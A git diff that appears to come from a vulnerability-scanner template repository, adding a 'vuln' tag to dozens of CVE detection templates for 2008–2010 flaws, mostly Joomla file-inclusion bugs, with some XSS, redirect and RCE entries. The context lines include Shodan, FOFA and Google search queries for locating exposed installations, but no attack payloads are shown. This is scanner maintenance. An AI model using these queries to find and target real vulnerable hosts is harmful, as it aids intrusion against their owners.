b/http/cves/2008/CVE-2008-2398.yaml index 1436274b5f7..f2d187677fa 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: appserv_open_project product: appserv - tags: cve2008,cve,xss,appserv_open_project,vkev + tags: cve2008,cve,xss,appserv_open_project,vkev,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 56ba63563cb..856526dabe8 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -29,7 +29,7 @@ info: vendor: cmsimple product: cmsimple shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple" - tags: cve,cve2008,lfi,cmsimple + tags: cve,cve2008,lfi,cmsimple,vuln http: - raw: diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 192e14751f2..4928fc5e1ea 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joomla product: com_imagebrowser - tags: cve2008,cve,joomla,lfi,edb + tags: cve2008,cve,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index f27a3f6fd81..1ddea9c9cc4 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: extplorer product: com_extplorer - tags: cve,cve2008,edb,joomla,lfi,extplorer + tags: cve,cve2008,edb,joomla,lfi,extplorer,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 5746eb1a363..44612e18cc0 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -33,7 +33,7 @@ info: - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin - tags: cve,cve2008,lfi,phppgadmin,edb + tags: cve,cve2008,lfi,phppgadmin,edb,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index b1d082569a3..be49d9e6a5a 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: codecall product: com_ionfiles - tags: cve,cve2008,edb,joomla,lfi,codecall + tags: cve,cve2008,edb,joomla,lfi,codecall,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 117b9afb7c4..13141600c90 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: weberr product: rwcards - tags: cve2008,cve,joomla,lfi,edb,weberr + tags: cve2008,cve,joomla,lfi,edb,weberr,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 2704b00c6a1..c42759e7d71 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlashowroom product: pro_desk_support_center - tags: cve,cve2008,joomla,lfi,edb,joomlashowroom + tags: cve,cve2008,joomla,lfi,edb,joomlashowroom,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 49004fab6fe..515d472beab 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"h-sphere" - intitle:"parallels h-sphere" - tags: cve,cve2008,xss,parallels,h-sphere + tags: cve,cve2008,xss,parallels,h-sphere,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 3cae3cbc5c2..4ed53168b82 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: dirk_bartley product: nweb2fax - tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley,vkev + tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley,vkev,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index a8c94bddf7b..06d989ab1fd 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: devalcms product: devalcms - tags: cve,cve2008,devalcms,xss,cms,edb + tags: cve,cve2008,devalcms,xss,cms,edb,vuln http: - method: GET diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index ea7c091275e..64c640ae3b1 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -29,7 +29,7 @@ info: - html:"SiteEngine" - http.html:"siteengine" fofa-query: body="siteengine" - tags: cve,cve2008,redirect,siteengine,boka + tags: cve,cve2008,redirect,siteengine,boka,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 8762fb059fa..642cb0481e5 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: autonomy product: ultraseek - tags: cve,cve2009,redirect,autonomy + tags: cve,cve2009,redirect,autonomy,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 0a5335f201a..d7a7adf9df4 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"zeroshell" fofa-query: title="zeroshell" google-query: intitle:"zeroshell" - tags: cve,cve2009,edb,zeroshell,kerbynet,rce,vkev + tags: cve,cve2009,edb,zeroshell,kerbynet,rce,vkev,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index a632eb1380c..504409a67fb 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: debian product: horde - tags: cve,cve2009,horde,lfi,traversal,edb,debian + tags: cve,cve2009,horde,lfi,traversal,edb,debian,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index ff3da88a079..173c804fabc 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -36,7 +36,7 @@ info: - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce,vkev + tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce,vkev,vuln http: - raw: diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index c93f520eea1..025f6910906 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve2009,cve,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index cb9e458d3d1..99428de2e31 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: cisco product: wvc54gca - tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb,vkev + tags: cve2009,cve,iot,linksys,camera,traversal,lfi,cisco,firmware,edb,vkev,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index b83d062810b..3799c0a2f75 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -37,7 +37,7 @@ info: - title="coldfusion administrator login" - app="adobe-coldfusion" google-query: intitle:"coldfusion administrator login" - tags: cve2009,cve,adobe,xss,coldfusion,tenable,vkev + tags: cve2009,cve,adobe,xss,coldfusion,tenable,vkev,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index eb3488ddf8b..ebbd1687828 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve,cve2009,joomla,lfi,edb + tags: cve,cve2009,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 51bcee2b079..71efb8f142b 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve2009,cve,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 1d4c97fab26..7cf51a3677b 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve2009,cve,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 3e700b3d127..be858cabb80 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomla product: joomla - tags: cve2009,cve,joomla,lfi,edb + tags: cve2009,cve,joomla,lfi,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index c76a79cc5e6..7f61ca1989b 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -32,7 +32,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve,cve2009,joomla,lfi,photo,edb + tags: cve,cve2009,joomla,lfi,photo,edb,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 6149e73b628..87b27eac368 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gianni_tommasi product: kr-php_web_content_server - tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi + tags: cve,cve2009,krweb,rfi,edb,gianni_tommasi,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 5fefd137dad..a4f002e5ede 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: inertialfate product: com_if_nexus - tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate + tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 27a106acdfd..872baf69fa5 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -25,7 +25,7 @@ info: vendor: awstats product: awstats shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" - tags: cve2009,cve,redirect,awstats + tags: cve2009,cve,redirect,awstats,vuln http: - method: GET diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 5b312abffbc..c1b90096383 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: iwork product: webglimpse - tags: cve,cve2009,edb,lfi,iwork + tags: cve,cve2009,edb,lfi,iwork,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index e62dd677156..f9a579fba10 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -30,7 +30,7 @@ info: - http.component:"joomla" - cpe:"cpe:2.3:a:joomla:joomla\!" fofa-query: body="joomla! - open source content management" - tags: cve2010,cve,joomla,lfi,edb,packetstorm + tags: cve2010,cve,joomla,lfi,edb,packetstorm,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index c33675a528e..df48d4d8d37 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -31,7 +31,7 @@ info: - http.html:"Apache Axis" - http.html:"apache axis" fofa-query: body="apache axis" - tags: cve,cve2010,axis,apache,default-login,axis2,vkev + tags: cve,cve2010,axis,apache,default-login,axis2,vkev,vuln http: - raw: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 83dcebb0dc6..12a615f0548 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chillcreations product: com_ccnewsletter - tags: cve2010,cve,joomla,lfi,edb,chillcreations + tags: cve2010,cve,joomla,lfi,edb,chillcreations,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 8003b356588..b6db85e0785 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlaworks product: jw_allvideos - tags: cve2010,cve,joomla,lfi,edb,joomlaworks + tags: cve2010,cve,joomla,lfi,edb,joomlaworks,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 5132e0a7ab4..ee032ff433a 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: greatjoomla product: scriptegrator_plugin - tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla + tags: cve,cve2010,joomla,lfi,plugin,edb,greatjoomla,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index c8aaefda7c3..0a97ae5af85 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: jvideodirect product: com_jvideodirect - tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect + tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 54337b4ec2b..9907dbc082a 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlart product: com_jashowcase - tags: cve,cve2010,joomla,lfi,edb,joomlart + tags: cve,cve2010,joomla,lfi,edb,joomlart,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 05e72c88395..d917bf8adc8 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thorsten_riess product: com_jcollection - tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess + tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 1af0f67a4d1..f509ae6533b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: g4j.laoneo product: com_gcalendar - tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo + tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index fc05a31e8f5..cbc4205c3fc 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomlamo product: com_cartweberp - tags: cve2010,cve,joomla,lfi,edb,joomlamo + tags: cve2010,cve,joomla,lfi,edb,joomlamo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index ef187d048be..20bc6d4c397 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chris_simon product: com_abbrev - tags: cve,cve2010,joomla,lfi,edb,chris_simon + tags: cve,cve2010,joomla,lfi,edb,chris_simon,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 3596a470e6a..1d8c8341c50 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: rockettheme product: com_rokdownloads - tags: cve,cve2010,joomla,lfi,edb,rockettheme + tags: cve,cve2010,joomla,lfi,edb,rockettheme,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index de8b4215a37..9acff9db410 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: corejoomla product: com_communitypolls - tags: cve,cve2010,joomla,lfi,edb,corejoomla + tags: cve,cve2010,joomla,lfi,edb,corejoomla,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 0a5489f3a0f..b32d4257d87 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: je_form_creator product: je_form_creator - tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator + tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 4ebb54294d0..bf284786180 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: com_janews product: com_janews - tags: cve,cve2010,joomla,lfi,edb,com_janews + tags: cve,cve2010,joomla,lfi,edb,com_janews,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index af81af7532c..3436af605cf 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: decryptweb product: com_dwgraphs - tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb + tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index c3b1c3c8dd0..542cc44c0c7 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomlamo product: com_userstatus - tags: cve,cve2010,joomla,lfi,status,edb,joomlamo + tags: cve,cve2010,joomla,lfi,status,edb,joomlamo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 46de3983e39..d4bb390d3a2 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlamo product: com_jinventory - tags: cve,cve2010,joomla,lfi,edb,joomlamo + tags: cve,cve2010,joomla,lfi,edb,joomlamo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index e145dd6973b..6c2a1d8d1fa 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: roberto_aloi product: com_joomlapicasa2 - tags: cve,cve2010,joomla,lfi,edb,roberto_aloi + tags: cve,cve2010,joomla,lfi,edb,roberto_aloi,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 6379643ebce..d699a26edd0 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: software.realtyna product: com_joomlaupdater - tags: cve,cve2010,edb,joomla,lfi,software.realtyna + tags: cve,cve2010,edb,joomla,lfi,software.realtyna,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index d79fe5f8f3a..6a2583581b4 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: la-souris-verte product: com_svmap - tags: cve,cve2010,joomla,lfi,edb,la-souris-verte + tags: cve,cve2010,joomla,lfi,edb,la-souris-verte,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index ba85d87d83b..4405a149983 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: ijoomla product: com_news_portal - tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla + tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index dbac485ad67..97a86afe620 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: seber product: com_sebercart - tags: cve,cve2010,joomla,lfi,edb,seber + tags: cve,cve2010,joomla,lfi,edb,seber,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index fdab3f34239..5c1867c6697 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomlanook product: com_hsconfig - tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook + tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 7c0562d0e54..33924f7b1dd 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlamo product: com_weberpcustomer - tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamo + tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamo,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index c2c3d210632..320b1e91d26 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla-research product: com_jresearch - tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research + tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 36b6bb9619d..04b80a79c41 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cookex product: com_ckforms - tags: cve2010,cve,lfi,edb,joomla,cookex + tags: cve2010,cve,lfi,edb,joomla,cookex,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index dcabd273d00..195515f4b0c 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: jooforge product: com_jukebox - tags: cve,cve2010,joomla,lfi,edb,packetstorm,jooforge + tags: cve,cve2010,joomla,lfi,edb,packetstorm,jooforge,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index caa3a6e189f..15a4f7f7491 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: wowjoomla product: com_loginbox - tags: cve,cve2010,joomla,lfi,edb,wowjoomla + tags: cve,cve2010,joomla,lfi,edb,wowjoomla,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 1dc9f0b1dd3..ba438f50c20 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ternaria product: com_vjdeo - tags: cve,cve2010,joomla,lfi,edb,packetstorm,ternaria + tags: cve,cve2010,joomla,lfi,edb,packetstorm,ternaria,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 61dcec06c51..3ac113506ce 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -35,7 +35,7 @@ info: - http.title:"jboss" fofa-query: title="jboss" google-query: intitle:"jboss" - tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat + tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 9a7a6494a7a..1d14eeacf0a 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: gogoritas product: com_photobattle - tags: cve,cve2010,joomla,lfi,photo,edb,gogoritas + tags: cve,cve2010,joomla,lfi,photo,edb,gogoritas,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index eb11e631e24..a508a8f39ed 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ternaria product: com_jprojectmanager - tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria + tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index c76162e10bf..996b9b288b2 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: dev.pucit.edu.pk product: com_webtv - tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk + tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 49df59e9a16..88719e8dc96 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: b-elektro product: com_addressbook - tags: cve,cve2010,joomla,lfi,edb,b-elektro + tags: cve,cve2010,joomla,lfi,edb,b-elektro,vuln http: - method: GET diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml 